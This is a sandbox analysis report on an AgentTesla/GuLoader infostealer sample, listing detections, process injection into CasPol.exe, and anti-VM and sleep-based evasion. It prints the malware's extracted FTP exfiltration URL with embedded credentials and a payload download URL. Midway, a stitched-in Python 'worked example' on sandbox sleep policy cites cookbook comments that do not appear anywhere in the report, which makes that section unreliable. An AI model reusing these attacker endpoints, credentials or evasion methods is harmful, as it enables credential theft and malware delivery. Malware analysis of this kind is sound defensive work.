Windows Analysis Report
6culQoI97a.exe

Overview

General Information

Sample Name: 6culQoI97a.exe
Analysis ID: 755473
MD5: d9aa122b8c39444799e60eabbab69502
SHA1: 0175baf7a240c2050571a6df273a892e8b192d81
SHA256: 317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • 6culQoI97a.exe (PID: 9084 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: D9AA122B8C39444799E60EABBAB69502)
    • CasPol.exe (PID: 2424 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
Malware configuration (AgentTesla): {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
Source | Rule | Description | Author | Strings
00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x30f14:$s10: logins
  • 0x46998:$s10: logins
  • 0x4fe48:$s11: credential
  • 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
  • 0x2346:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B
  • 0x2892:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 6culQoI97a.exe | ReversingLabs: Detection: 73%
Source: 6culQoI97a.exe | Virustotal: Detection: 56%
Source: ftp://ftp.gettoner.com.mx/droid | Avira URL Cloud: Label: malware
Source: http://195.178.120.24/mhpgXW188.chm | Avira URL Cloud: Label: malware
Source: 6culQoI97a.exe.9084.2.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
Source: 6culQoI97a.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 6culQoI97a.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_00406448 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_004027A1 FindFirstFileA,
Source: Joe Sandbox View | IP Address: 195.178.120.24
Source: global traffic | HTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 195.178.120.24 | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.gettoner.com.mx/droid
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000009.00000002.5786454694.0000000001396000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://195.178.120.24/mhpgXW188.chm
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://NwSpLV.com
Source: 6culQoI97a.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 6culQoI97a.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary

Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\6culQoI97a.exe | File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EE3AF0 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EE2B7C NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\6culQoI97a.exe | File read: C:\Users\user\Desktop\6culQoI97a.exe
Source: 6culQoI97a.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\6culQoI97a.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\6culQoI97a.exe C:\Users\user\Desktop\6culQoI97a.exe
Source: C:\Users\user\Desktop\6culQoI97a.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\6culQoI97a.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\6culQoI97a.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\6culQoI97a.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bracker
Source: C:\Users\user\Desktop\6culQoI97a.exe | File created: C:\Users\user\AppData\Local\Temp\nskC4E.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/4@0/1
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_0040216B CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\6culQoI97a.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Source: Yara match | File source: 00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_73DD2F60 push eax; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC514F push edi; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC9AEB pushad ; retf
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC56C8 push ds; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC3ACA push esp; iretd
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECC658 push cs; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC4BE4 push 6B8BC5CBh; retf
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC3FB0 push ss; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC537B push edi; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC24CD push esp; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC145C pushad ; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC517A push edi; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC4D44 push ebx; retf
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECC13C pushfd ; retn BE8Dh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 9_2_0124142F push edi; retn 0000h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 9_2_1D444C51 push ds; ret
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_73DD1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
Source: C:\Users\user\Desktop\6culQoI97a.exe | File created: C:\Users\user\AppData\Local\Temp\nspCBC.tmp\System.dll
Source: C:\Users\user\Desktop\6culQoI97a.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\6culQoI97a.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\6culQoI97a.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
Source: 6culQoI97a.exe, 00000002.00000002.1203249010.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPGZ
Source: 6culQoI97a.exe, 00000002.00000002.1203507076.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6664 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6664 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8632 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC81AD rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_00406448 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_004027A1 FindFirstFileA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\6culQoI97a.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\6culQoI97a.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\6culQoI97a.exe | API call chain: ExitProcess graph end node
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: CasPol.exe, 00000009.00000002.5787444252.00000000013C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000009.00000002.5785252784.000000000135B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: 6culQoI97a.exe, 00000002.00000002.1203249010.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exepGz
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: 6culQoI97a.exe, 00000002.00000002.1203507076.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_73DD1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC81AD rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC6E46 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EC6E47 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECBA0D mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECBA0D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECBBF7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECB7CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECA44C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECB84D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECB80E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EDFDE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECB960 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECB17E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EE1D76 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02ECC936 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6culQoI97a.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_02EDFE03 LdrLoadDll,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: page read and write | page guard
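Worked example (added to this report, not Joe Sandbox code): the sleep figures above decoded and run through the sandbox's own sleep policy. It assumes the report's "Thread sleep time" and "delay time" numbers are milliseconds (the -30000 comparison value lines up with the 30 s rule and -180000 with the "Contains long sleeps (>= 3 min)" signature) and takes the policy from the cookbook comments further down, where sleeps above 100000000 ms are reduced to 1000 ms. Two observations it makes concrete: 922337203685477 is exactly (2^63-1)/10000, the largest NtDelayExecution interval in 100 ns units expressed in ms, so that call asks to wait effectively forever and the policy neutralises it; the 180000 ms sleep is under the cap, so under that policy the sandbox waits the full three minutes out of a 13m33s run, which is the situation the "Sample execution stops while process was sleeping" signature describes. Thread IDs and the run budget are taken from the lines in this report; the sample lines are constructed from them.

```python
"""Decode sandbox sleep records and apply the sandbox's sleep-skipping policy.

Added example, not Joe Sandbox code. Assumes the report's sleep figures are
milliseconds and that the policy is: sleeps above 100,000,000 ms become 1000 ms.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

TICKS_PER_MS = 10_000                # NtDelayExecution intervals are 100 ns units
INT64_MAX = (1 << 63) - 1

SANDBOX_SLEEP_CAP_MS = 100_000_000   # from the cookbook comments in this report
SANDBOX_REPLACEMENT_MS = 1_000
LONG_SLEEP_MS = 180_000              # "Contains long sleeps (>= 3 min)"
SUSPICIOUS_SLEEP_MS = 30_000         # the "-30000s" comparison value in the sleep lines

_SLEEP_LINE = re.compile(r"(?:Thread sleep time|delay time): ?(-?\d+)")


def interval_to_ms(delay_interval: int) -> int:
    """Milliseconds for a LARGE_INTEGER DelayInterval (negative = relative delay)."""
    return abs(delay_interval) // TICKS_PER_MS


def parse_sleep_ms(line: str) -> int | None:
    """Requested sleep in ms from one report line, or None if the line has none."""
    m = _SLEEP_LINE.search(line)
    return abs(int(m.group(1))) if m else None


@dataclass(frozen=True)
class SleepVerdict:
    requested_ms: int
    effective_ms: int   # what the sandbox actually waits under its policy
    skipped: bool       # True when the policy replaced the sleep
    label: str


def evaluate_sleep(requested_ms: int, budget_ms: int) -> SleepVerdict:
    """Classify one sleep and say whether the sandbox policy neutralises it.

    The dangerous case is a sleep below the cap but at or beyond the remaining
    budget: the policy leaves it alone and the run times out while the sample idles.
    """
    skipped = requested_ms > SANDBOX_SLEEP_CAP_MS
    effective = SANDBOX_REPLACEMENT_MS if skipped else requested_ms
    if requested_ms >= LONG_SLEEP_MS:
        label = "long sleep (>= 3 min)"
    elif requested_ms >= SUSPICIOUS_SLEEP_MS:
        label = "sleep >= 30 s"
    else:
        label = "short sleep"
    if skipped:
        label += ", reduced by sandbox policy"
    elif effective >= budget_ms:
        label += ", exceeds remaining analysis budget"
    return SleepVerdict(requested_ms, effective, skipped, label)


def time_spent_sleeping_ms(lines: list[str], budget_ms: int) -> int:
    """Sum of the effective sleeps for a set of report lines."""
    total = 0
    for line in lines:
        ms = parse_sleep_ms(line)
        if ms is not None:
            total += evaluate_sleep(ms, budget_ms).effective_ms
    return total


# Constructed sample input: three of the sleep lines from the evasion section.
REPORT_LINES = [
    "CasPol.exe TID: 6664 Thread sleep time: -180000s >= -30000s",
    "CasPol.exe TID: 8632 Thread sleep time: -36000s >= -30000s",
    "CasPol.exe Thread delayed: delay time: 922337203685477",
]
RUN_BUDGET_MS = 13 * 60_000 + 33_000   # "Overall analysis duration: 0h 13m 33s"

if __name__ == "__main__":
    # A DelayInterval of magnitude 2^63-1 converts to the report's 922337203685477 ms.
    print("max interval in ms:", interval_to_ms(INT64_MAX))
    for line in REPORT_LINES:
        print(evaluate_sleep(parse_sleep_ms(line), RUN_BUDGET_MS))
    print("ms spent sleeping under policy:", time_spent_sleeping_ms(REPORT_LINES, RUN_BUDGET_MS))
```

Running the block prints one verdict per line; the 3-minute sleep is the only one the policy does not touch, so a cookbook that lowers the cap (or patches sleeps above, say, 60 s) is the practical fix for this family.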

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\6culQoI97a.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: FB0000
Source: C:\Users\user\Desktop\6culQoI97a.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\6culQoI97a.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
